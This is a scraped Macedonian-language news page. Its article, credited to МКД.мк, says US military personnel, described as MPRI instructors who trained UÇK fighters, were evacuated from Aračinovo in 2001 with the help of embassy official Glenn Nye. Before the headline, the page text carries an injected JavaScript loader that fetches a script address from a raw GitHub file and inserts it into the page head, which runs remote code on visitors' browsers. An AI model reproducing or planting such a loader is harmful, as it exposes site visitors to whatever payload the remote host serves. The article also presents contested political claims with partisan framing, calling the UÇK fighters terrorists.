;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Воени лица на САД кои обучувале терористи од УЧК, заедно биле извлечени од Арачиново во 2001 година - Антропол
АктуелноИнтернационално

Воени лица на САД кои обучувале терористи од УЧК, заедно биле извлечени од Арачиново во 2001 година

Поранешниот член на Претставничкиот дом во САД од демократската партија Глен Нај, во 2016 година, беше добитник на наградата на честа од Стејт департментот за неговата улога во организирањето на извлекувањето на 26 американски воени лица, заедно со униформирани лица на УЧК, за време на настаните во Арачиново во јуни 2001 година.

Во биографијата на Глен Нај стои дека тој бил вработен во Стејт департментот и во Агенцијата на САД за меѓународен развој во Косово, Македонија, Израел, Ирак и Авганистан. За време на конфликтот во Македонија во 2001 година тој ја организирал евакуацијата на бунтовниците Албанци, кои заедно со 26 американски воени лица биле заробени во Арачиново.

Нај во 2001 година бил еден од вработените во американската амбасада во Скопје. За него тогаш се пишуваше дека има некаква улога за време на настаните во Арачиново кога македонската војска беше подготвена да го нападне селото. Во тој период имаше основани сомненија дека заедно со терористите биле евакуирани и американски војници, но во биографијата на Глен Нај пишува дека улогата на овие американски ветерани била токму обуката на униформираните лица на УЧК.

Амбасадата знаеше дека се таму, но сите телефонски врски беа прекинати. Глен Нај сметаше дека има шанси да контактира со Американците преку локални политички контакти… Добивме телефонски број на еден политички активист кој живееше во кризниот регион. Користејќи ја таа врска и проширувајќи ја со други броеви од мобилни телефони, Глен успеа да ја организира идентификацијата на сите Американци кои требаше да бидат евакуирани. Потоа Глен разговараше со координаторот за бегалци на Амбасадата за да се обезбеди шофер на автобус кој ќе сака да влезе во областа и ќе ги земе Американците“.

Оваа случка, Од страна на Нај, Во неколку наврати беше потврдена, но тој никогаш не се охрабри прецизно не ги наведе местото и времето на таа акција. Американската амбасада во Скопје никогаш официјално не потврди дека за време на настаните во Арачиново имало и некаква евакуација на американски воени лица од селото, но се чини дека ова останува јавна тајна.

Токму со присуство на овие американските војници на 8-ми јуни Арачиново беше заземено од припадниците на УЧК, а на 26 јуни, на иницијатива на меѓународната заедница, беше организирана нивната евакуација со автобуси. Од биографијата на Глен Нај, се дознава дека заедно со нив биле евакуирани и инструктори на МПРИ.

Извор МКД.мк.